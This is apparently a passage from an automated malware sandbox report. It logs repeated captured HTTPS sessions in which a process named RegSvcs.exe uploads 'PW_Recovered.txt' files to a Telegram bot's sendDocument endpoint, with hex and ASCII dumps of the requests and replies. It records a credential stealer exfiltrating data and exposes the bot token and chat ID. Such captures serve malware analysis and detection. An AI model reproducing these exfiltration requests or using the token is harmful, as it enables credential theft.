                                                                          2024-09-19 10:23:03 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12779,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          57192.168.2.561590149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:07 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce72aa89fc853
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:07 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 32 61 61 38 39 66 63 38 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dce72aa89fc853Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:07 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:07 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:07 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12781,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          58192.168.2.561591149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:07 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce39b9b85919c
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:07 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 39 62 39 62 38 35 39 31 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dce39b9b85919cContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:08 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:08 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:08 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12782,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          59192.168.2.561594149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:11 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce7aa69158b0e
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:11 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 37 61 61 36 39 31 35 38 62 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dce7aa69158b0eContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:11 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:11 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 562
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:11 UTC562INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12783,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          60192.168.2.561595149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:12 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce43bdbce8cfe
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:12 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 33 62 64 62 63 65 38 63 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dce43bdbce8cfeContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:12 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:12 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:12 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12784,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          61192.168.2.561598149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:15 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce833a5cad7e1
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:15 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 38 33 33 61 35 63 61 64 37 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dce833a5cad7e1Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:15 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:15 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:15 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12785,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          62192.168.2.561600149.154.167.2204435688C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:16 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce4fe8cefc2ba
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:16 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 34 66 65 38 63 65 66 63 32 62 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 31 37
                                                                          Data Ascii: --------------------------8dce4fe8cefc2baContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:17
                                                                          2024-09-19 10:23:16 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:16 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                          2024-09-19 10:23:16 UTC561INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 34 37 32 34 39 35 34 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 6e 61 6b 65 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 79 74 68 6f 6e 73 68 69 6e 65 6b 75 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 34 30 33 39 34 38 36 39 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 74 5c 75 32 30 31 39 73 20 67 65 74 20 69 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 47 65 74 20 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 77 69 6e 6e 69 6e 67 33 31 31 36 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61
                                                                          Data Ascii: {"ok":true,"result":{"message_id":12786,"from":{"id":7247249543,"is_bot":true,"first_name":"Pythonsnakebot","username":"Pythonshineku_bot"},"chat":{"id":403948698,"first_name":"Let\u2019s get it","last_name":"Get it","username":"winning3116","type":"priva


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          63192.168.2.561602149.154.167.2204431488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-09-19 10:23:19 UTC369OUTPOST /bot7247249543:AAEjQNxXUVZRm1ev9K9Jf_pcuz9vHQRkYyU/sendDocument?chat_id=403948698&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=------------------------8dce8b65a0f3d9f
                                                                          Host: api.telegram.org
                                                                          Content-Length: 560
                                                                          Connection: Keep-Alive
                                                                          2024-09-19 10:23:19 UTC560OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 38 62 36 35 61 30 66 33 64 39 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 36 35 35 34 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 39 2f 30 39 2f 32 30 32 34 20 2f 20 30 36 3a 32 31 3a 30 34
                                                                          Data Ascii: --------------------------8dce8b65a0f3d9fContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:965543Date and Time: 19/09/2024 / 06:21:04
                                                                          2024-09-19 10:23:20 UTC388INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0
                                                                          Date: Thu, 19 Sep 2024 10:23:20 GMT
                                                                          Content-Type: application/json
                                                                          Content-Length: 561
                                                                          Connection: close
                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                          Access-Control-Allow-Origin: *
                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
